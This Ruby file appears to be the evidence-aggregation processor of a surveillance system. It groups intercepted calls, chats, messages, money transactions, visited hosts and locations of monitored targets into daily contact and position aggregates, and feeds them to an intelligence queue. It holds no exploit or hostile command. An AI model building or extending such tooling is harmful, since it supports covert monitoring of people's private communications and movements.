lib/rcs-aggregator/processor.rb
#
# Aggregator processing module
#
# the evidence to be processed are queued by the workers
#
require 'rcs-common/trace'
require 'rcs-common/fixnum'
require 'rcs-common/sanitize'
require 'fileutils'
require_relative 'peer'
require_relative 'position'
require_relative 'virtual'
require_relative 'money'
module RCS
module Aggregator
class Processor
extend RCS::Tracer
@@status = 'Starting...'
def self.status
@@status
end
def self.run
# check if we are the last shard and enable the position aggregation
# we use this technique to avoid conflicts between multiple positioner
enable_position = RCS::DB::Shard.last == RCS::DB::Config.instance.global['SHARD']
types = AggregatorQueue::AGGREGATOR_TYPES
types.delete('position') unless enable_position
# infinite processing loop
loop do
# get the first entry from the queue and mark it as processed to avoid
# conflicts with multiple processors
if (queued = AggregatorQueue.get_queued(types))
entry = queued.first
count = queued.last
@@status = "Aggregating #{count} evidence in queue"
trace :info, "#{count} evidence to be processed in queue"
process entry
else
#trace :debug, "Nothing to do, waiting..."
@@status = 'Idle...'
sleep 1
end
end
rescue Interrupt
trace :info, "System shutdown. Bye bye!"
return 0
rescue Exception => e
trace :error, "Thread error: #{e.message}"
trace :fatal, "EXCEPTION: [#{e.class}] " << e.backtrace.join("\n")
retry
end
def self.process(entry)
ev = Evidence.target(entry['target_id']).find(entry['evidence_id'])
target = Item.find(entry['target_id'])
trace :info, "Processing #{ev.type} evidence for target #{target.name.inspect}"
# extract peer(s) from call, mail, chat, sms
data = extract_data(entry['target_id'], ev)
data.each do |datum|
# already exist?
# update
# else
# create new one
type = datum[:type]
# we need to find a document that is in the same day, same type and that have the same peer and versus
# if not found, create a new entry, otherwise increment the number of occurrences
params = {aid: ev.aid, day: Time.at(datum[:time]).getutc.strftime('%Y%m%d'), type: type, ev_type: ev.type}
case type
when :position
params.merge!({data: {position: datum[:point]}})
agg = aggregate_position(datum, entry, params)
when :url
params.merge!({data: {host: datum[:host]}})
agg = aggregate_virtual(datum, entry, params)
else
params.merge!({data: {peer: datum[:peer], versus: datum[:versus], sender: datum[:sender]}})
agg = aggregate_peer(datum, entry, params)
end
trace :info, "Aggregated #{target.name}: #{agg.day} #{agg.type} #{agg.count} #{agg.data.inspect}"
end
rescue Exception => e
puts e.backtrace.join("\n")
trace :error, "Cannot process evidence: #{e.message}"
trace :fatal, e.backtrace.join("\n")
end
def self.check_intelligence_license
LicenseManager.instance.check :intelligence
end
def self.aggregate_position(datum, entry, params)
# find similar point or create a new one
agg = PositionAggregator.find_similar_or_create_by(entry['target_id'], params)
# add the timeframe to the aggregate
agg.add_to_set(:info, datum[:timeframe])
# we have to alert the intelligence for every new timeframe saved in the aggregate
agg.add_to_intelligence_queue if check_intelligence_license
agg.inc(:count, 1)
agg
end
def self.aggregate_peer(datum, entry, params)
# pass the peer to the Frequencer to check if a new suggested entity has to be created
if params[:ev_type] != 'money' and check_intelligence_license
PeerAggregator.create_suggested_peer(entry['target_id'], params)
end
# find the existing aggregate or create a new one
agg = Aggregate.target(entry['target_id']).find_or_create_by(params)
# if it's new, add the entry to the handle book and notify the intelligence
if agg.count == 0
HandleBook.insert_or_update(params[:type], datum[:peer], entry['target_id'])
agg.add_to_intelligence_queue if check_intelligence_license
end
# we are sure we have the object persisted in the db
# so we have to perform an atomic operation because we have multiple aggregator working concurrently
agg.inc(:count, 1)
# sum up the duration (or size)
agg.inc(:size, datum[:size])
return agg
end
def self.aggregate_virtual(datum, entry, unique_filter)
aggregate_class = Aggregate.target(entry['target_id'])
agg = aggregate_class.find_or_create_by(unique_filter)
agg.inc(:count, 1)
agg
end
def self.extract_data(target_id, ev)
data = []
case ev.type
when 'money'
data += MoneyAggregator.extract_tx(ev)
when 'call'
data += PeerAggregator.extract_call(ev)
when 'chat'
data += PeerAggregator.extract_chat(ev)
when 'message'
data += PeerAggregator.extract_message(ev)
when 'position'
data += PositionAggregator.extract(target_id, ev) if check_intelligence_license
when 'url'
data += VirtualAggregator.extract(ev) if check_intelligence_license
end
return data
end
end
end #OCR::
end #RCS::